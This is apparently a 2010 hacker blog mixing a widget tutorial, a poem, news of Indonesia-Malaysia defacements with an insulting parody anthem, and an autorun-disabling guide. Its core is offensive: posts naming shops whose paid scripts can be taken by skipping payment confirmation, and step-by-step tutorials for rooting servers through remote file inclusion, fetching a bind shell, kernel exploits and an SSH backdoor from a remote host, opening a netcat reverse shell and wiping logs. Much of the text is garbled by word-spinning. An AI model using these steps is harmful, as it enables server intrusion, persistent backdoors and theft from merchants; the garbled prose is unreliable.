...::[BABY CORP]::...

How To Make Hidden ShoutMix

BabyCorp — Sat, 13 Feb 2010 22:46:48 +0000

Maybe we’ve apparent ShoutBox hidden abode by the owner, sometimes to the larboard or right. Now the altercation this time I wish a little allotment with accompany who are still abashed bloggers to accomplish it.

ready for ya .. okay, accede the afterward command

First:
1. Login to your Blogger account, baddest “Layout” again “Page Elements“,
2. Click the “Add a Gadget” in the aspect may wheresoever, accept “HTML / JavaScript“,
3. Copy-paste the cipher below:


 
 
  
 

How to Make This
 
 
 [close]

* In the cipher above, for the words “Replace this with your bedfellow book code” and alter the cipher with the cipher bedfellow book you get from the site,

* You can aswell set the position. Just Change the amount of its top attributes. If you wish added advancement slightly, change so 30px or 20px, it’s up to you.

city’s heart

BabyCorp — Tue, 09 Feb 2010 16:06:17 +0000

Paused
Eliminate fatigue liver
Hit back
My confined in here

My wish to GO AWAY …!!!
Go as far as possible
The wind ran
piercing the bottom corners of the physical

Departure full of doubt
Towards the deepest heart desires
Until coming to life
I’ve got to rebound the city’s heart

density of people coming and going
decorated the imagination of the sun
make eyes
beautiful painted gods creation

trying to merge in the heart
etched into an endless dream
thousands of intuition haunted hearts
only lo remove this shadow

tried to curse myself
rotten thoughts accompany
occasionally even out the holy water
clean the wound in the heart

I run like the wind
away from the shadow that always came
every moment, every time
I can not seem to have arrived in paradise

I stopped footing
footsteps of thousands of feet carved through this
but the thought had never gone
even still haunt …

phpgalleria Bug Founded

BabyCorp — Sun, 07 Feb 2010 03:13:48 +0000

While visit google to find some script Online Tools so that I can walk again, I also find a number of websites that errors when they access the logo.gif. It’s also a sense come to explore the brain of question why this can happen in shops that use modern means of online payment such as paypal. Here is how that can penetrate shops I’ve visited:

The image “http://phpgalleria.com/shop/catalog/images/logo.gif” cannot be displayed, because it contains errors.

How to got scripts from phpgalleria.com

Create a new account (free)Choose the script you want to get it ^^
Click Add to Cart
Click CheckOut
Choose PayPal as a payement methode but don’t Click ” Confirm Order “
Now To download your File : just go to

http://phpgalleria.com/shop/catalog/checkout_process.php

http://phpgalleria.com/checkout_process.php

It Working for me Hope it works for you.

100 Website Malaysia Hacked by Indonesian Hackers

BabyCorp — Fri, 29 Jan 2010 07:10:07 +0000

Cracker cyber war between Indonesia and Malaysia continue to flame. Some communities Indonesian hackers crippling mass action the site is owned by the State Jiran. Unsparing, almost 100 sites around Malaysia fallen.

In the action, actors deface, who on behalf of himself from Indonesian Hackers crippling 96 sites around Malaysia. Executors displays a special page entitled “Down with Malingsial” to accommodate a surge of resentment against Malaysia.

Here the text of defaced website :

Hacked By INDONESIA

Ini dadaku, mana dadamu?

Kalau Malaysia mau konfrontasi ekonomi
Kita hadapi dengan konfrontasi ekonomi

Kalau Malaysia mau konfrontasi politik
Kita hadapi dengan konfrontasi politik

Kalau Malaysia mau konfrontasi militer
Kita hadapi dengan konfrontasi militer

Soekarno, 1963

TUNDUK TERTINDAS ATAU BANGKIT MELAWAN… KARENA DIAM ADALAH PENGHIANATAN!! TIDAK ADA KATA MERDEKA UNTUK MALAYSIA… JIKA SUKA MENCURI MILIK TETANGGA!!!! MALAYSIA (MALing budAYa indoneSIA)

Here the list of some website that defaced by indonesian hackers :

Source : Detikinet

Again !! Malaysian Websites Hacked by Indonesian Hackers

BabyCorp — Fri, 29 Jan 2010 07:09:48 +0000

Cyber attack insistently back to the site launched in Malaysia. This time, approximately 25 sites to be dedemit victims of cyber attacks that claimed to come from Indonesia.

These attacks once again backed by Malaysia’s behavior often casually Indonesia annexed the original culture.

While Malaysia is subject to the site hack various kinds, such as gamemoneys.com,malaysia-securitysystem.com,www.tengchangyeow.com and dozens more.

Attacked the site page displays a message from the perpetrators of the attack. In essence, they protest as Malaysia’s behavior did not give up claim to the culture of Indonesia.

“Notice: NEVER thought we would ABSOLUTE SILENCE OUR CULTURAL LEGACY OF OUR ANCESTORS YG LEGACY NOT STATE STORE lowered to like you” as stated in the pages of a victim site.

It is not known exactly who was to be perpetrators of this attack. It’s just that, they claim as virtual dedemit group called Indonesian Defacer, Minang H4xor Crew, Team, and Indonesian Serverisdown Coder.

In the previous attack, nearly 100 sites Malaysia also subverted. The trigger was the same attack, namely that Malaysia is often stolen the Indonesian culture.

Source : Detikinet

Indonesia VS Malaysia

BabyCorp — Fri, 04 Sep 2009 12:30:43 +0000

Indonesia Raya song was edited by someone claiming to bloger Jiran home country (Malaysia) country of origin terrorist leader Noordin M Top.Dalam song says Indonesia dirt and full of vomit, verbal abuse was not inevitable here, Garuda Bird Coat even replaced by the logo is very menyakitkan.poetry makes the heart of Indonesia Raya replaced with dirty words through a blogspot IhateIndon:

Indonesial National Anthem

Indonesial tanah Cairku
Tanah tumpah muntahku
Disanalah aku merangkak hina
Jadi kubur

Indonesial negara miskin ku
Bangsa Busuk dan Tanah Miskinku
Marilah kita semua tidur
Indonesial negara miskinku

Mati lah tanahku
Modar lah negriku
Bangsaku Rakyatku semuanya
Miskin lah jiwanya
Tidurlah badannya
Untuk Indonesial Miskin

Indonesial Miskin
Mampous Modar
Datang kerja Malaysia
Tapi TKI Jadi perampok
Rompak Malaysia bawa wang ke Indon

Indonesial Pendatang Haram
Miskin lah Miskin lah
Datang Haram ke Malaysia
Tiada paspor
Bila kena tangkap dan hantar balik
Kata nya malaysia jahat

Indonesial Negara Perampok
Indonesial Menghantar perampok maling
pekerja TKI Indonesial
hantaq pi Malaysia

Indonesial Maling
Merampok lagu Malaysia
Mengatakan itu lagu mereka

Indonesial Tanah yang hina
Tanah gersang yang miskin
Di sanalah aku miskin Untuk slama-lamanya
Indonesial Tanah puaka
Puaka Hantu Kita semuanya
Negara luas hasil bumi banyak tapi miskin
Datang minta sedekah di Malaysia
Marilah kita mendoa Indonesial brengset

Gersang lah Tanahnya mundurlah jiwanya
Bangsanya Rakyatnya semuanya
Tidurlah hatinya Mimpilah budinya
Untuk Indonesial Miskin

Indonesial Tanah yang kotor Tanah kita yang Malang
Disanalah aku tidur selamanya bermimpi sampai mati
Indonesial! Tanah Malang Tanah yang aku sendiri benci
Marilah kita berjanji Indonesial miskin

Mati lah Rakyatnya Modar lah putranya
Negara Miskin Tentera Coma pakai Basikal
Miskinlah Negrinya Mundur lah Negara nya
Untuk Indonesial kurap

After seeing the lyric in Indonesia who have not volatile karuan by the Malaysian people are not responsible, whether we as a people of Indonesia who should defend the nation & Indonesian homeland can only silent and voiceless?? Only every heart of the readers, who can answer all of them ….

Merdeka atoe Mati!!!!

Tunduk tertindas atau berontak melawan…..

Disable Autorun Function in Windows

BabyCorp — Sat, 22 Aug 2009 22:43:29 +0000

The spread of the virus late last this many facilities utilize auto run on windows, which often stick to the virus in the autorun file windows often utilize this file as a door to enter the computer system, as a precaution, of course it’s good we do with the prevention of entry of the virus is turning off the autorun facility windows.

there are several ways you can do:
The first way:
Pressing and holding down the Shift key when we install / insert Flashdisk / CD-ROM (not running on windows Vista).
* disable through Registry
* Utilizing facilities gpedit.msc

disable Autorun from Registry :

Open the Registry Editor, Start Menu> Run, type regedit

Open the following key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

If there NoDriveTypeAutoRun key, then double click the value and content with one of the following values:

Decimal hexadecimal effect produced
181 B5 Autorun does not run at all for all media
149 95 is active only for the Autorun CD-ROM / DVD-ROM
177 Autorun b1 only for active flash drive (flash and the like)
145 91 active Autorun for all media

Key NoDriveTypeAutoRun # If there is no way to make the right click, select New> Binary Value. NoDriveTypeAutoRun and give it a name, and content value (double click) with the value above.
Step # above effect only in the user concerned. So that in effect all users of the computer, do the same thing for the Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\

Utilizing facilities gpedit.msc

This can be done for users of Windows 2000, Server 2003 and Windows XP Professional, the steps are as follows:

From the Start Menu> Run, type gpedit.msc and click OK.

Select Computer Configuration> Administrative Templates and click System

In the Settings panel, right-click Turn off Autoplay and click Properties (in Windows 2000, named Disable Autoplay)

Click Enabled and select All drives in the box for Turn off Autoplay off the autorun facility in all drive.

Click OK, and close the dialog window.

Restart Computer.

For Users of Windows Vista, do the following:

From the Start Menu type Gpedit.msc the Start Search box and press enter (it may be in the show command to enter the administrator password)

In the Computer Configuration section select Administrative Templates and select Windows Components click again Autoplay Policies

In the Details pane, double-click Turn off Autoplay

Click Enabled and select All drives in the box for Turn off Autoplay disable Autorun on all drives.

Restart Computer.

How To Take Over Root Server Injection

BabyCorp — Thu, 20 Aug 2009 20:36:38 +0000

This time I will teach some steps in taking over the server root injection. I get this tutorial from Google, please try to learn because I was still in the stage of learning.

Here Overview of how take over root server injection :

First get a target then we load bind telnet
1. sh# wget http://geocities.com/bstraq/alat/bind.tar.gz atau bind.zip
sh# tar -zxvf bind.tar.gz;rm -rf bind.tar.gz
sh# ./bind

and log on with the telnet port 2009 telnet pass: bhl2009

example:
telnet iptarget 2009

and later will ask for your password. Enter the password bhl2009
next step we proceed root ….

2. sh# cd /tmp atau directory full write
sh# wget http://geocities.com/bstraq/alat/root.tar.gz
sh# tar -zxvf root.tar.gz;rm -rf root.tar.gz
sh# cd .binsh
sh#. / match with the kernel from the server

example.
- Kernel 2.4.20
sh # ./brk2
bravo make sure you can login root
try typing the command id
uid = 0 (root) GUID = 0 (root)

3. Do not forget to install ssh backdoor after obtaining the root

follow the steps below …

sh# cd ~
sh# wget http://geocities.com/bstraq/alat/sshdoor.tar.gz
sh# tar -zxvf sshdoor.tar.gz;rm -rf sshdoor.tar.gz
sh# cd sshdoor
sh# ./install passwordmu portmu

example.

- # Sh. / Install bhl 1234
- # Sh. / Install bhl 1212

Good Luck.

Source : BHL CREW

Founded Bug Web APP / Web Script

BabyCorp — Thu, 20 Aug 2009 20:11:00 +0000

While visit google to find some script Online Tools so that I can walk again, I also find a number of websites that errors when they access the logo.gif. It’s also a sense come to explore the brain of question why this can happen in shops that use modern means of online payment such as paypal. Here is how that can penetrate shops I’ve visited:

The image “http://1dollarmarket.net/shop/catalog/images/logo.gif” cannot be displayed, because it contains errors.

&

How to got scripts from cobrascripts.com & 1dollarmarket.net

Create a new account (free)Choose the script you want to get it ^^

Click Add to Cart

Click CheckOut

Choose PayPal as a payement methode but don’t Click ” Confirm Order “

Now To download your File : just go to

http://1dollarmarket.net/shop/catalog/checkout_process.php

Or

http://cobrascripts.com/checkout_process.php

It Working for me Hope it works for you.

Local Root via NetCat

BabyCorp — Mon, 17 Aug 2009 19:26:13 +0000

You will need:
Quote:
- Vulnerable Site in R.F.I.
- Carapace for R.F.I. (e.g. c99, r57 or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)

This aim tutorial is to accord a actual accepted account in action of Rooting in Linux Server with Safe Mod: OFF.Suppose that we accept begin a website with RFI vulnerability:

Code:

http://www.hackedsite.com/folder/index.html?page=

e can run shell exploiting Remote File Inclusion, as follows:

Code:

http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?

where evilscript.txt is our web carapace that we accept already uploaded to our site. (www.mysite.com in the folder: shells)

After we admission in shell, aboriginal of all we will see the adaptation of the atom at the top of the page or by typing: uname – a in Command line.

To abide we accept to affix with backconnection to the box. This can done with two means if we accept the acceptable shell.

We can use the Back-Connect bore of r57/c99 carapace or to upload a backconnector in a writable folder

In a lot of of the shells there is a backconnection affection after to upload the Affix Back Carapace (or addition one carapace in perl/c). We will assay the aboriginal way which is axial the carapace (in our archetype the carapace is r57).

Initially we accessible NetCat and accord to accept in a specific anchorage (this anchorage accept to be accurately opened/forwarded in NAT/Firewall if we accept a router) with the afterward way:

We will type: 11457 in the anchorage ascribe (This is the absence anchorage for the endure versions of r57 shell). We can use and added port.

We press in Windows Start -> Run -> and we type: cmd

After we will go to the NetCat directory:

Quote:

cd C:\Program Files\Netcat
And we type the following command:
Quote:
nc -n -l -v -p 11456
NetCat respond: listening on [any] 11456 …

In the axial page of r57 carapace we acquisition beneath the afterward menu::: Net:: and back-connect. In the IP Anatomy we will blazon our IP (www.cmyip.com to see our ip if we accept dynamic)

In the Anchorage anatomy we will put the anchorage that we opened and NetCat listens.

If we columnist affix the carapace will respond:

Now Software try affix to anchorage 11456 …

If our settings are actual NetCat will accord us a carapace to the server

Now we wil abide to the Rooting proccess.

We accept to acquisition a writable binder in adjustment to download and abridge the Bounded Basis Accomplishment that will accord us basis priviledges in the box. Depending on the adaptation of the Linux atom there are altered exploits. Some times the exploits abort to run because some boxes are patched or we don’t accept the actual permissions.List of the exploits/kernel:

Quote:
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

We will see the case of 2.6.8 Linux kernel. We will charge the h00lyshit exploit.

Some sites that we can acquisition Bounded Basis Exploits:

milw0rm (Try Search: “linux kernel”)

Other sites: www.packetstormsecurity.org | www.milw0rm.com or try Googlin’ you can find ‘em all

We can acquisition writable folders/files by typing:
Code:

find / -perm -2 -ls

We can use the /tmp binder which is a accepted writable folder

We type:
Code:

cd /tmp

To download the bounded basis accomplishment we can use a download command for linux like wget.

For example:
Quote:
wget http://www.yoursite.com/localroot/h00lyshit.c
where http://www.yoursite.com/localroot/h00lyshit.c is the url of h00lyshit.

After the download we accept to abridge the accomplishment (Read the apprenticeship of the accomplishment afore the compile)

For the h00lyshit we accept to type:
Code:

gcc h00lyshit.c -o h00lyshit

Now we accept created the executable file: h00lyshit.

The command to run this accomplishment is:
Code:

./h00lyshit

We charge a actual big book on the deejay in adjustment to run auspiciously and to get root.

We accept to actualize a big book in /tmp or into addition writable folder.

The command is:
Code:

dd if=/dev/urandom of=largefile count=2M

where largefile is the filename.

We accept to delay 2-3 minutes for the book creation

If this command fails we can try:
Code:

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

Now we can procced to the endure step. We can run the accomplishment by typing:
Code:

./h00lyshit largefile or

./h00lyshit /tmp/largefile

(If we are in a altered writable binder and the largefile is created in /tmp)

If there are not active errors (maybe the atom is patched or is something amiss with accomplishment run or ample file) we will get root

To analysis if we got root:

id or

whoami

If it says basis we got root!

Now we can deface/mass blemish all the sites of the server or to bureaucracy a rootkit (e.g. SSHDoor) and to yield ssh/telnet carapace admission to the server.

We accept to abolish all logs in adjustment to be safe with a log cleaner. A acceptable cleaner for this job is the MIG Log Cleaner.